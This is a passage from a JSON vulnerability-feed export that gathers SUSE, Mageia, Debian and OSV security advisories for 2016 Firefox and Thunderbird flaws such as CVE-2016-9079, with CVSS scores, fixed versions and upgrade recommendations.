text (fixed\n in version 50.0.1)\n * Redirection from an HTTP connection to a data: URL could inherit wrong\n origin after an HTTP redirect (fixed in version 50.0.1, bmo#1317641,\n MFSA 2016-91, boo#1012807, CVE-2016-9078)\n * Maliciously crafted SVG animations could cause remote code execution\n (fixed in version 50.0.2, bmo#1321066, MFSA 2016-92, boo##1012964,\n CVE-2016-9079)\n\n", "cvss3": {}, "published": "2016-12-04T22:07:40", "type": "suse", "title": "Security update for MozillaFirefox (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-9079", "CVE-2016-9078"], "modified": "2016-12-04T22:07:40", "id": "OPENSUSE-SU-2016:2994-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00008.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T18:39:55", "description": "This update for MozillaThunderbird fixes some potential security issues\n and bugs.\n\n The following security flaws cannot be exploited through email because\n scripting is disabled when reading mail, but are potentially risks in\n browser or browser-like contexts:\n\n - CVE-2016-9079: SVG Animation Remote Code Execution (MFSA 2016-92,\n bsc#1012964)\n - CVE-2016-5296: Heap-buffer-overflow WRITE in rasterize_edges_1\n (bsc#1010411)\n - CVE-2016-5297: Incorrect argument length checking in Javascript\n (bsc#1010401)\n - CVE-2016-9066: Integer overflow leading to a buffer overflow in\n nsScriptLoadHandler (bsc#1010404)\n - CVE-2016-5291: Same-origin policy violation using local HTML file and\n saved shortcut file (bsc#1010410)\n - CVE-2016-5290: Memory safety bugs fixed in Thunderbird ESR 45.5\n (bsc#1010427)\n\n The update contains changes in behavior:\n\n - Changed recipient address entry: Arrow-keys now copy the pop-up value to\n the input field. Mouse-hovered pop-up value can no longer be confirmed\n with tab or enter key. This restores the behavior of Thunderbird 24.\n - Support changes to character limit in Twitter\n\n The following bugs were fixed:\n\n - Reply with selected text containing quote resulted in wrong quoting\n level indication\n - Email invitation might not be displayed when description contains\n non-ASCII characters\n - Attempting to sort messages on the Date field whilst a quick filter is\n applied got stuck\n on sort descending\n - Mail address display at header pane displayed incorrectly if the address\n contains UTF-8 according to RFC 6532\n\n", "cvss3": {}, "published": "2016-12-06T13:07:20", "type": "suse", "title": "Security update for MozillaThunderbird (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5290", "CVE-2016-5297", "CVE-2016-5296", "CVE-2016-9079", "CVE-2016-5291", "CVE-2016-9066"], "modified": "2016-12-06T13:07:20", "id": "OPENSUSE-SU-2016:3019-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00012.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T18:39:46", "description": "This update for MozillaFirefox, mozilla-nss fixes security issues and bugs.\n\n The following vulnerabilities were fixed in Firefox ESR 45.5.1\n (bsc#1009026 bsc#1012964):\n\n - CVE-2016-9079: Use-after-free in SVG Animation (MFSA 2016-92\n bsc#1012964)\n - CVE-2016-5297: Incorrect argument length checking in Javascript\n (bsc#1010401)\n - CVE-2016-9066: Integer overflow leading to a buffer overflow in\n nsScriptLoadHandler (bsc#1010404)\n - CVE-2016-5296: Heap-buffer-overflow WRITE in rasterize_edges_1\n (bsc#1010395)\n - CVE-2016-9064: Addons update must verify IDs match between current and\n new versions (bsc#1010402)\n - CVE-2016-5290: Memory safety bugs fixed in Firefox 50 and Firefox ESR\n 45.5 (bsc#1010427)\n - CVE-2016-5291: Same-origin policy violation using local HTML file and\n saved shortcut file (bsc#1010410)\n\n The following vulnerabilities were fixed in mozilla-nss 3.21.3:\n\n - CVE-2016-9074: Insufficient timing side-channel resistance in divSpoiler\n (bsc#1010422)\n - CVE-2016-5285: Missing NULL check in PK11_SignWithSymKey /\n ssl3_ComputeRecordMACConstantTime causes server crash (bsc#1010517)\n\n The following bugs were fixed:\n\n - Firefox would fail to go into fullscreen mode with some window managers\n (bsc#992549)\n - font warning messages would flood console, now using fontconfig\n configuration from firefox-fontconfig instead of the system one\n (bsc#1000751)\n\n", "cvss3": {}, "published": "2016-12-10T23:09:49", "type": "suse", "title": "Security update for MozillaFirefox, mozilla-nss (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5290", "CVE-2016-5297", "CVE-2016-9064", "CVE-2016-5296", "CVE-2016-9079", "CVE-2016-5291", "CVE-2016-9074", "CVE-2016-9066", "CVE-2016-5285"], "modified": "2016-12-10T23:09:49", "id": "SUSE-SU-2016:3080-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00037.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T18:39:46", "description": "This update for MozillaFirefox, mozilla-nss fixes security issues and bugs.\n\n The following vulnerabilities were fixed in Firefox ESR 45.5.1\n (bsc#1009026):\n\n - CVE-2016-9079: Use-after-free in SVG Animation (bsc#1012964 MFSA 2016-92)\n - CVE-2016-5297: Incorrect argument length checking in Javascript\n (bsc#1010401)\n - CVE-2016-9066: Integer overflow leading to a buffer overflow in\n nsScriptLoadHandler (bsc#1010404)\n - CVE-2016-5296: Heap-buffer-overflow WRITE in rasterize_edges_1\n (bsc#1010395)\n - CVE-2016-9064: Addons update must verify IDs match between current and\n new versions (bsc#1010402)\n - CVE-2016-5290: Memory safety bugs fixed in Firefox 50 and Firefox ESR\n 45.5 (bsc#1010427)\n - CVE-2016-5291: Same-origin policy violation using local HTML file and\n saved shortcut file (bsc#1010410)\n\n The following vulnerabilities were fixed in mozilla-nss 3.21.3:\n\n - CVE-2016-9074: Insufficient timing side-channel resistance in divSpoiler\n (bsc#1010422)\n - CVE-2016-5285: Missing NULL check in PK11_SignWithSymKey /\n ssl3_ComputeRecordMACConstantTime causes server crash (bsc#1010517)\n\n The following bugs were fixed:\n\n - Firefox would fail to go into fullscreen mode with some window managers\n (bsc#992549)\n - font warning messages would flood console, now using fontconfig\n configuration from firefox-fontconfig instead of the system one\n (bsc#1000751)\n\n", "cvss3": {}, "published": "2016-12-13T13:07:50", "type": "suse", "title": "Security update for MozillaFirefox, mozilla-nss (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5290", "CVE-2016-5297", "CVE-2016-9064", "CVE-2016-5296", "CVE-2016-9079", "CVE-2016-5291", "CVE-2016-9074", "CVE-2016-9066", "CVE-2016-5285"], "modified": "2016-12-13T13:07:50", "id": "SUSE-SU-2016:3105-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00049.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T18:39:45", "description": "This update to Mozilla Firefox 50.0.2, Thunderbird 45.5.1 and NSS 3.16.2\n fixes a number of security issues.\n\n The following vulnerabilities were fixed in Mozilla Firefox (MFSA 2016-89):\n\n - CVE-2016-5296: Heap-buffer-overflow WRITE in rasterize_edges_1\n (bmo#1292443)\n - CVE-2016-5292: URL parsing causes crash (bmo#1288482)\n - CVE-2016-5297: Incorrect argument length checking in Javascript\n (bmo#1303678)\n - CVE-2016-9064: Addons update must verify IDs match between current\n and new versions (bmo#1303418)\n - CVE-2016-9066: Integer overflow leading to a buffer overflow in\n nsScriptLoadHandler (bmo#1299686)\n - CVE-2016-9067: heap-use-after-free in nsINode::ReplaceOrInsertBefore\n (bmo#1301777, bmo#1308922 (CVE-2016-9069))\n - CVE-2016-9068: heap-use-after-free in nsRefreshDriver (bmo#1302973)\n - CVE-2016-9075: WebExtensions can access the mozAddonManager API and\n use it to gain elevated privileges (bmo#1295324)\n - CVE-2016-9077: Canvas filters allow feDisplacementMaps to be applied\n to cross-origin images, allowing timing attacks on them (bmo#1298552)\n - CVE-2016-5291: Same-origin policy violation using local HTML file and\n saved shortcut file (bmo#1292159)\n - CVE-2016-9070: Sidebar bookmark can have reference to chrome window\n (bmo#1281071)\n - CVE-2016-9073: windows.create schema doesn't specify "format":\n "relativeUrl" (bmo#1289273)\n - CVE-2016-9076: select dropdown menu can be used for URL bar spoofing\n on e10s (bmo#1276976)\n - CVE-2016-9063: Possible integer overflow to fix inside XML_Parse in\n expat (bmo#1274777)\n - CVE-2016-9071: Probe browser history via HSTS/301 redirect + CSP\n (bmo#1285003)\n - CVE-2016-5289: Memory safety bugs fixed in Firefox 50\n - CVE-2016-5290: Memory safety bugs fixed in Firefox 50 and Firefox ESR\n 45.5\n\n The following vulnerabilities were fixed in Mozilla NSS 3.26.1:\n\n - CVE-2016-9074: Insufficient timing side-channel resistance in\n divSpoiler (bmo#1293334)\n\n Mozilla Firefox now requires mozilla-nss 3.26.2.\n\n New features in Mozilla Firefox:\n\n - Updates to keyboard shortcuts Set a preference to have Ctrl+Tab cycle\n through tabs in recently used order View a page in Reader Mode by\n using Ctrl+Alt+R\n - Added option to Find in page that allows users to limit search to\n whole words only\n - Added download protection for a large number of executable file types\n on Windows, Mac and Linux\n - Fixed rendering of dashed and dotted borders with rounded corners\n (border-radius)\n - Added a built-in Emoji set for operating systems without native Emoji\n fonts\n - Blocked versions of libavcodec older than 54.35.1\n - additional locale\n\n mozilla-nss was updated to 3.26.2, incorporating the following changes:\n\n - the selfserv test utility has been enhanced to support ALPN\n (HTTP/1.1) and 0-RTT\n - The following CA certificate was added: CN = ISRG Root X1\n - NPN is disabled and ALPN is enabled by default\n - MD5 signature algorithms sent by the server in CertificateRequest\n messages are now properly ignored\n\n", "cvss3": {}, "published": "2016-12-05T19:07:18", "type": "suse", "title": "Security update for Mozilla Firefox, Thunderbird and NSS (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5290", "CVE-2016-9070", "CVE-2016-5297", "CVE-2016-9075", "CVE-2016-9065", "CVE-2016-9068", "CVE-2016-5292", "CVE-2016-9063", "CVE-2016-5299", "CVE-2016-9064", "CVE-2016-9071", "CVE-2016-5296", "CVE-2016-9079", "CVE-2016-5289", "CVE-2016-5295", "CVE-2016-5291", "CVE-2016-5294", "CVE-2016-9074", "CVE-2016-5298", "CVE-2016-9061", "CVE-2016-9072", "CVE-2016-9077", "CVE-2016-9066", "CVE-2016-5293", "CVE-2016-9069", "CVE-2016-9067", "CVE-2016-9078", "CVE-2016-9073", "CVE-2016-9076", "CVE-2016-9062"], "modified": "2016-12-05T19:07:18", "id": "OPENSUSE-SU-2016:3011-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00010.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "A flaw was found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox (CVE-2016-9079). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-05T21:49:27", "type": "mageia", "title": "Updated firefox packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-05T21:49:27", "id": "MGASA-2016-0410", "href": "https://advisories.mageia.org/MGASA-2016-0410.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "A heap-buffer-overflow in Cairo when processing SVG content caused by compiler optimization, resulting in a potentially exploitable crash (CVE-2016-5296). The Mozilla Updater can be made to choose an arbitrary target working directory for output files resulting from the update process. This vulnerability requires local system access (CVE-2016-5294). An error in argument length checking in JavaScript, leading to potential integer overflows or other bounds checking issues (CVE-2016-5297). A buffer overflow resulting in a potentially exploitable crash due to memory allocation issues when handling large amounts of incoming data (CVE-2016-9066). A same-origin policy bypass with local shortcut files to load arbitrary local content from disk (CVE-2016-5291). Mozilla developers and community members Olli Pettay, Christian Holler, Ehsan Akhgari, Jon Coppeard, Gary Kwong, Tooru Fujisawa, Philipp, and Randell Jesup reported memory safety bugs present in Thunderbird ESR 45.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code (CVE-2016-5290). A use-after-free vulnerability in SVG Animation has been discovered. An exploit built on this vulnerability has been discovered in the wild targeting Firefox and Tor Browser users on Windows (CVE-2016-9079). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-05T21:49:27", "type": "mageia", "title": "Updated thunderbird packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5294", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9066", "CVE-2016-9079"], "modified": "2016-12-05T21:49:27", "id": "MGASA-2016-0409", "href": "https://advisories.mageia.org/MGASA-2016-0409.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2023-02-24T12:27:39", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3728-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 01, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : firefox-esr\nCVE ID : CVE-2016-9079\n\nA use-after-free vulnerability in the SVG Animation was discovered in\nthe Mozilla Firefox web browser, allowing a remote attacker to cause a\ndenial of service (application crash) or execute arbitrary code, if a\nuser is tricked into opening a specially crafted website.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 45.5.1esr-1~deb8u1.\n\nWe recommend that you upgrade your firefox-esr packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-01T14:27:36", "type": "debian", "title": "[SECURITY] [DSA 3728-1] firefox-esr security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-01T14:27:36", "id": "DEBIAN:DSA-3728-1:FD07E", "href": "https://lists.debian.org/debian-security-announce/2016/msg00311.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-21T22:11:50", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3728-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 01, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : firefox-esr\nCVE ID : CVE-2016-9079\n\nA use-after-free vulnerability in the SVG Animation was discovered in\nthe Mozilla Firefox web browser, allowing a remote attacker to cause a\ndenial of service (application crash) or execute arbitrary code, if a\nuser is tricked into opening a specially crafted website.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 45.5.1esr-1~deb8u1.\n\nWe recommend that you upgrade your firefox-esr packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-01T14:27:36", "type": "debian", "title": "[SECURITY] [DSA 3728-1] firefox-esr security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-01T14:27:36", "id": "DEBIAN:DSA-3728-1:26413", "href": "https://lists.debian.org/debian-security-announce/2016/msg00311.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-23T21:43:02", "description": "Package : icedove\nVersion : 45.5.1-1~deb7u1\nCVE ID : CVE-2016-5290 CVE-2016-5291 CVE-2016-5296 CVE-2016-5297 \n CVE-2016-9066 CVE-2016-9074 CVE-2016-9079\n\nMultiple security issues have been found in Icedove, Debian's version of\nthe Mozilla Thunderbird mail client: Multiple memory safety errors,\nsame-origin policy bypass issues, integer overflows, buffer overflows\nand use-after-frees may lead to the execution of arbitrary code or\ndenial of service.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n45.5.1-1~deb7u1.\n\nWe recommend that you upgrade your icedove packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-17T20:19:56", "type": "debian", "title": "[SECURITY] [DLA 752-1] icedove security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9066", "CVE-2016-9074", "CVE-2016-9079"], "modified": "2016-12-17T20:19:56", "id": "DEBIAN:DLA-752-1:F9780", "href": "https://lists.debian.org/debian-lts-announce/2016/12/msg00027.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-24T12:27:29", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3730-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 11, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : icedove\nCVE ID : CVE-2016-5290 CVE-2016-5291 CVE-2016-5296 CVE-2016-5297\n CVE-2016-9066 CVE-2016-9074 CVE-2016-9079\n\nMultiple security issues have been found in Icedove, Debian's version of\nthe Mozilla Thunderbird mail client: Multiple memory safety errors,\nsame-origin policy bypass issues, integer overflows, buffer overflows\nand use-after-frees may lead to the execution of arbitrary code or\ndenial of service.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:45.5.1-1~deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:45.5.1-1 or earlier.\n\nWe recommend that you upgrade your icedove packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-11T16:05:42", "type": "debian", "title": "[SECURITY] [DSA 3730-1] icedove security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9066", "CVE-2016-9074", "CVE-2016-9079"], "modified": "2016-12-11T16:05:42", "id": "DEBIAN:DSA-3730-1:A6927", "href": "https://lists.debian.org/debian-security-announce/2016/msg00313.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T22:11:26", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3730-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 11, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : icedove\nCVE ID : CVE-2016-5290 CVE-2016-5291 CVE-2016-5296 CVE-2016-5297\n CVE-2016-9066 CVE-2016-9074 CVE-2016-9079\n\nMultiple security issues have been found in Icedove, Debian's version of\nthe Mozilla Thunderbird mail client: Multiple memory safety errors,\nsame-origin policy bypass issues, integer overflows, buffer overflows\nand use-after-frees may lead to the execution of arbitrary code or\ndenial of service.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:45.5.1-1~deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:45.5.1-1 or earlier.\n\nWe recommend that you upgrade your icedove packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-11T16:05:42", "type": "debian", "title": "[SECURITY] [DSA 3730-1] icedove security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9066", "CVE-2016-9074", "CVE-2016-9079"], "modified": "2016-12-11T16:05:42", "id": "DEBIAN:DSA-3730-1:96B35", "href": "https://lists.debian.org/debian-security-announce/2016/msg00313.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-08-10T07:09:59", "description": "\nA use-after-free vulnerability in the SVG Animation was discovered in\nthe Mozilla Firefox web browser, allowing a remote attacker to cause a\ndenial of service (application crash) or execute arbitrary code, if a\nuser is tricked into opening a specially crafted website.\n\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 45.5.1esr-1~deb8u1.\n\n\nWe recommend that you upgrade your firefox-esr packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-01T00:00:00", "type": "osv", "title": "firefox-esr - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2022-08-10T07:09:54", "id": "OSV:DSA-3728-1", "href": "https://osv.dev/vulnerability/DSA-3728-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-21T08:12:39", "description": "\nMultiple security issues have been found in the Mozilla Firefox web\nbrowser: Multiple memory safety errors, buffer overflows and other\nimplementation errors may lead to the execution of arbitrary code or\nbypass of the same-origin policy.\n\n\nA man-in-the-middle attack in the addon update mechanism has been fixed.\n\n\nA use-after-free vulnerability in the SVG Animation was discovered,\nallowing a remote attacker to cause a denial of service (application\ncrash) or execute arbitrary code, if a user is tricked into opening a\nspecially crafted website.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n45.5.1esr-1~deb7u1.\n\n\nWe recommend that you upgrade your firefox-esr packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-01T00:00:00", "type": "osv", "title": "firefox-esr - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": 